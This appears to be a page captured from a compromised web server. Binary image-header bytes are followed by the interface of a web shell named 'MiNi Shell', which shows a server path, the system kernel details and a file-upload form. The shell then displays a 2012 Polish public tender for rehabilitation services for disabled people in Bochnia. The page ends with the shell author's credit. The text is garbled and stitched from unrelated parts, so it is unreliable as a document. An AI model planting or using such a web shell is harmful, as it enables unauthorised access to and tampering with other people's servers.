JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120720/262392-N-2012.html

<p class="kh_header"><b>Bochnia: Przeprowadzenie zajęć rehabilitacyjnych dla osób niepełnosprawnych w ramach realizowanego projektu pn. Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</b><br>
<b>Numer ogłoszenia: 262392 - 2012; data zamieszczenia: 20.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. G. Windakiewicza 9/5, 32-700 Bochnia, woj. małopolskie, tel. 14 611 97 40, faks 14 611 97 40.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć rehabilitacyjnych dla osób niepełnosprawnych w ramach realizowanego projektu pn. Wzmacnianie integracji społecznej w Powiecie Bocheńskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie zajęć rehabilitacyjnych i zespołów ćwiczeń  fizycznych dla maksymalnie 30 osób w wieku aktywności zawodowej. Są to osoby niepełnosprawne w stopniu znacznym i/lub umiarkowanym przede wszystkim z powodu dysfunkcji narządu ruchu i lub choroby neurologicznej oraz osoby posiadające niepełnosprawność sprzężoną, osoby w stanach pourazowych, oraz w stanach postępujących chorobowo, osoby korzystające w poprzednich latach realizacji projektu pn. Wzmacnianie integracji społecznej w Powiecie Bocheńskim z zajęć rehabilitacyjnych. 

Cel zajęć rehabilitacyjnych: 
Celem zajęć rehabilitacyjnych jest dalsza poprawa stanu zdrowia, poprzez przywracanie  lub usprawnianie sprawności psychofizyczne osób niepełnosprawnych w wyniku zastosowania określonych sposobów postępowania rehabilitacyjnego. Zajęcia rehabilitacyjne powinny utrzymać kondycję, umożliwić lub przyspieszyć proces naturalnej regeneracji oraz zmniejszyć następstwa ustrojowe spowodowane przez chorobę, urazy. Uczestnictwo w zajęciach rehabilitacyjnych przyczyni się do zniesienia dolegliwości bólowych poszczególnych części ciała, a także dolegliwości wynikających z przebywania w pozycji siedzącej, w przypadku osób poruszających się na wózkach inwalidzkich, a także wpłynie na poprawę funkcjonalnych oraz  motorycznych możliwości organizmu i poprawie ulegnie zakres ruchu. 

Zajęcia rehabilitacyjne ukierunkowane będą na wykorzystanie biologicznych metod oddziaływania na osobę z dysfunkcją organizmu - narządu ruchu i lub chorobą neurologiczną w celu poprawy zdrowia, ograniczenia somatycznych skutków dysfunkcji organizmu. U większości osób rehabilitacja ma charakter leczenia funkcjonalnego, czyli jest to świadomy proces polegającym na intencjonalnym i celowym wykorzystaniu ściśle określonych ćwiczeń i zabiegów dla uzyskania poprawy samopoczucia somatycznego i psychicznego. Uzyskane efekty fizjologiczne mogą być istotnym czynnikiem w zapobieganiu lub zmniejszaniu tempa rozwoju choroby i niepełnosprawności. 

Przedmiot zamówienia obejmuje wykonanie następujących działań:a. Powołanie Zespołu Konsultacyjnego (zwanego dalej ZK) w składzie lekarz specjalista 
w dziedzinie rehabilitacji medycznej, lub reumatologii, lub ortopedii, lub neurologii, lub traumatologii oraz rehabilitant, rozpatrującego skierowania wydane przez Powiatowe Centrum Pomocy Rodzinie dla zakwalifikowanych uczestników. Skierowania zawierać będą kserokopie orzeczeń o stopniu niepełnosprawności osób kierowanych. b. Przeprowadzenie przez ZK konsultacji medycznej oraz wydanie zaświadczeń kwalifikujących lub niekwalifikujących do udziału w zajęciach rehabilitacyjnych. Osoby kierowane będą podczas konsultacji lekarskiej mogą przedstawiać posiadaną dokumentację medyczną np. wyniki badań, obrazy radiologiczne (np. rtg, usg, tomografia komputerowa rezonans magnetyczny), zaświadczenia o stanie zdrowia oraz wyniki udziału w poprzednim cyklu zajęć rehabilitacyjnych w ramach udziału w projekcie. c. Zespół Konsultacyjny na podstawie zebranej wiedzy określi rodzaj schorzenia, stadium zaawansowania, możliwość rehabilitacji w danym schorzeniu bądź określi przeciwwskazania do objęcia indywidualnym programem rehabilitacyjnym. Efektem uczestnictwa w indywidualnym programie powinna być poprawa samopoczucia psychofizycznego uczestników projektu. d. Opracowanie i realizacja indywidualnych programów rehabilitacyjnych dla uczestników uwzględniających następujące metody rehabilitacji: kinezyterapię (maksymalnie 150 godzin dla 30 osób) i lub fizykoterapię (maksymalnie 455 zabiegów dla 30 osób) i lub masaż (maksymalnie 90 godzin dla 30 osób) i/lub inne metody rehabilitacyjne, m.in. metodę PNF lub inne metody mające na względzie potrzeby psychofizyczne skierowanych osób. Indywidualne programy mogą być realizowane w miejscu wykonywania działalności Wykonawcy, tj. mieście Bochnia i lub w miejscu zamieszkania osoby niepełnosprawnej, jeśli jej stan zdrowia i niepełnosprawność tego wymaga. Realizacja programu w warunkach domowych może dotyczyć maksymalnie 8 osób niepełnosprawnych, w związku z tym należy uwzględnić konieczność dojazdów wynoszących ogółem nie więcej niż 700 km łącznie do 8 osób niepełnosprawnych. 
W domu osoby niepełnosprawnej zapewniona powinna być konsultacja lekarska oraz co najmniej zabiegi fizjoterapeutyczne prowadzone przez rehabilitantów. e. Zajęcia rehabilitacyjne powinny odbywać się od poniedziałku do piątku między 08:00 a 20:00 oraz w soboty między 8:00 a 13:00 w okresie od dnia podpisania umowy do 30 listopada 2012 r. Wykonawca powinien posiadać przenośny sprzęt do wykonywania masażu, fizykoterapii i kinezyterapii oraz samochód w celu dojazdów do osób niepełnosprawnych zakwalifikowanych do indywidualnego programu prowadzonego w warunkach domowych u osoby niepełnosprawnej na terenie powiatu bocheńskiego. 
f. Na zakończenie realizacji indywidualnego programu lub na zakończenie danego etapu lub w momencie przerwania udziału w programie przez osobę skierowaną ZK dokona oceny efektów wykonanych działań rehabilitacyjnych i wyda pisemne zaświadczenie. g. Zakres indywidualnych programów powinien być opracowany i zrealizowany zgodnie z potrzebami osób skierowanych. Powinien obejmować następujące metody rehabilitacji: kinezyterapię i/lub fizykoterapię i lub masaż i lub inne metody rehabilitacyjne, m.in. metodę PNF lub inne metody uwzględniając potrzeby psychofizyczne skierowanych osób. 

Skierowania wydawane przez Powiatowe Centrum Pomocy Rodzinie będą zawierały kserokopie orzeczeń o niepełnosprawności osób kierowanych, ocena efektów wykonanych działań oraz wyniki poprzedniego cyklu zajęć rehabilitacyjnych w ramach projektu , a osoby kierowane będą informowane przez Zamawiającego o możliwości przedstawienia Wykonawcy również innych dokumentów (np. wyników badań lekarskich, zaświadczeń o stanie zdrowia), które mogłyby być pomocne Wykonawcy w procesie kwalifikowania do udziału w zajęciach rehabilitacyjnych. 
Zamawiający zastrzega sobie, iż ze względu na charakter projektu pn. Wzmacnianie integracji społecznej w Powiecie Bocheńskim, a zwłaszcza ze względu na skierowane osoby zakwalifikowane do uczestnictwa w programach rehabilitacyjnych ich organizacja musi być przeprowadzona na terenie miasta Bochnia, a w przypadku zajęć rehabilitacyjnych w warunkach domowych w miejscu zamieszkania osoby niepełnosprawnej, tj. na terenie Powiatu Bocheńskiego.  Wykonawca powinien wykonać następujące zadania w czasie realizacji usługi, w tym: 1. niezwłocznie informować o niestawieniu się osoby skierowanej na wyznaczone działania, 2. przedkładać do 3 dnia każdego miesiąca w okresie trwania umowy harmonogramy planowanych działań, a w razie niespodziewanej zmiany harmonogramu niezwłocznego informować o zmianach  w formie pisemnej, 3. przedkładać w oryginale imienne zaświadczenia lekarskie dla każdej skierowanej osoby, zawierające wskazanie lub przeciwwskazanie lekarskie do uczestnictwa w zajęciach rehabilitacyjnych, 4. przedkładać w oryginale indywidualne programy rehabilitacyjne, 5. przedkładać w oryginale oceny efektów wykonanych działań rehabilitacyjnych, 6.zamieszczać w okresie obowiązywania umowy na tablicach ogłoszeniowych i/lub w innych widocznych miejscach realizacji usług Wykonawcy afiszy formatu A3+ Tu realizowany jest projekt Wzmacnianie integracji społecznej w Powiecie Bocheńskim dostarczonych przez Zamawiającego. Wymagania dotyczące kadry bezpośrednio realizującej usługę: 1. W Zespole Konsultacyjnym lekarz specjalista w dziedzinie rehabilitacji medycznej, lub reumatologii, lub ortopedii, lub neurologii, lub traumatologii. 2. W Zespole Konsultacyjnym rehabilitant - mgr rehabilitacji z minimum 5 letnią praktyką na stanowisku rehabilitanta. 3. Wykwalifikowany personel pomocniczy, rehabilitanci, technicy.  Oświadczenie o kwalifikacjach kadry należy dołączyć do oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 85.12.11.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do rejestru ewidencji działalności gospodarczej, wystawione nie wcześniej 
niż 6 miesięcy przed upływem terminu składania ofert;
- Aktualny wpis do rejestru zakładów opieki zdrowotnej prowadzonego przez właściwego Wojewodę, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły pełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku wykazanie, że Wykonawca wykonywał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, usługi (co najmniej 2) w zakresie przedmiotu zamówienia, tj. usługi rehabilitacyjnej, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających,  że te usługi zostały wykonane lub są wykonywane należycie zgodnie z załącznikiem nr 5 do SIWZ.

ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły pełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna za spełnienie tego warunku wykazanie przez Wykonawcę, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają aktualne uprawnienia zawodowe w zakresie przedmiotu zamówienia, posiadanie kwalifikacji niezbędnych do wykonywania masażu, fizykoterapii i kinezyterapii, zgodnie 
z załącznikiem nr 6 do SIWZ
- Posiadają niezbędny sprzęt do wykonania masażu, fizykoterapii, kinezyterapii,
- Posiada samochód.

ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły pełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć przy realizacji zamówienia

ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły pełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione, nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzające, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu 
o udzielenie zamówienia albo składania ofert;

ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły pełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy,
Oświadczenie Wykonawcy, że spełnia wymogi art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Oświadczenie Wykonawcy , że cena oferty obejmuje pełny zakres usługi oraz jest zgodna z wytycznymi SIWZ.
W celu potwierdzenia braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawca składa Oświadczenie, o którym mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych.
Wykaz usług wykonanych w okresie ostatnich trzech latach
Wykaz osób, które będą uczestniczyć przy realizacji zamówienia 
Zaakceptowany wzór umowy
Oświadczenie Wykonawcy o czasie prowadzenia działalności w zakresie wykonywania zajęć rehabilitacyjnych w  ramach prowadzonej działalności.

ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły pełnia - nie spełnia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie wykonawcy w zakresie realizacji zajęć rehabilitacyjnych - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/powiaty/root_bochenski/Wprowadzenie/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Bochni ul. Windakiewicza 9/5,32-700 Bochnia 
pcpr@powiatbochenski.eu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Bochni ul. Windakiewicza 9/5,32-700 Bochnia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt Wzmacnianie integracji społecznej w Powiecie Bocheńskim współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com